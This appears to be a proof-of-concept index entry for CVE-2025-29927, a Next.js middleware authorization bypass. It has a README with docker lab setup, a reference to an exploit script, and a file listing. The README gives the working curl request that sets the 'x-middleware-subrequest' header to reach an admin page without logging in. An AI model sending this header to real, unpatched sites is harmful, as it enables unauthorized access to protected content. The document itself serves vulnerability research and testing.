POC details: 03c9ebc5ffbfe0381ab55b9ddd8f87f48c6425e1

Source
Related vulnerability
Title: Next.js security vulnerability (CVE-2025-29927)
Description: Next.js is an open-source React framework from Vercel. Versions of Next.js before 14.2.25 and before 15.2.3 have a security vulnerability: if the authorization check is performed in middleware, it can be bypassed.
Description
Research on Next.js middleware vulnerability (CVE-2025-29927) allowing authorization bypass and potential exploits.
Introduction
# Next.js Middleware Vulnerability Research (CVE-2025-29927)

This repository demonstrates a critical **vulnerability in Next.js** middleware (CVE-2025-29927), which affects versions 11.1.4 through 15.1.7. This vulnerability allows for **authorization bypass**, **CSP bypass**, and potential **DoS attacks** through cache-poisoning. The issue originates in the way the `x-middleware-subrequest` header is handled, allowing attackers to bypass middleware protection mechanisms.

This proof of concept targets the vulnerability as it appears in **v12**.

## Usage

### Environment setup

Set up the vulnerable environment using docker and the files from this repo by running:

```bash
git clone https://github.com/l1uk/nextjs-middleware-exploit.git
cd nextjs-middleware-exploit
docker build -t my-next-app .
docker run -p 3000:3000 my-next-app
```

### Exploit 

This repository already includes an `exploit.sh` script that tests exploitation of the vulnerability. To run it:

```bash
chmod +x exploit.sh
./exploit.sh
```

You can also test exploitation manually with the following steps:

1. Request the admin page without authentication. You should get a redirection to the `login` page.

```bash
curl -i http://localhost:3000/admin
```

2. Request the same page without authentication but with the `x-middleware-subrequest` header set. The middleware authentication check should be bypassed and the admin page returned.

```bash
curl -i -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/admin
```

## Security Advisory

- **CVE-2025-29927**: [Security Advisory Link](https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw)
File snapshot

```
[4.0K] /data/pocs/03c9ebc5ffbfe0381ab55b9ddd8f87f48c6425e1
├── [ 365] Dockerfile
├── [ 665] exploit.sh
├── [  46] next.config.js
├── [ 242] package.json
├── [4.0K] pages
│   ├── [ 369] about.js
│   ├── [ 157] admin.js
│   ├── [ 375] index.js
│   ├── [ 550] login.js
│   └── [1.3K] _middleware.js
├── [1.6K] README.md
└── [4.0K] styles
    └── [ 119] global.css

2 directories, 11 files
```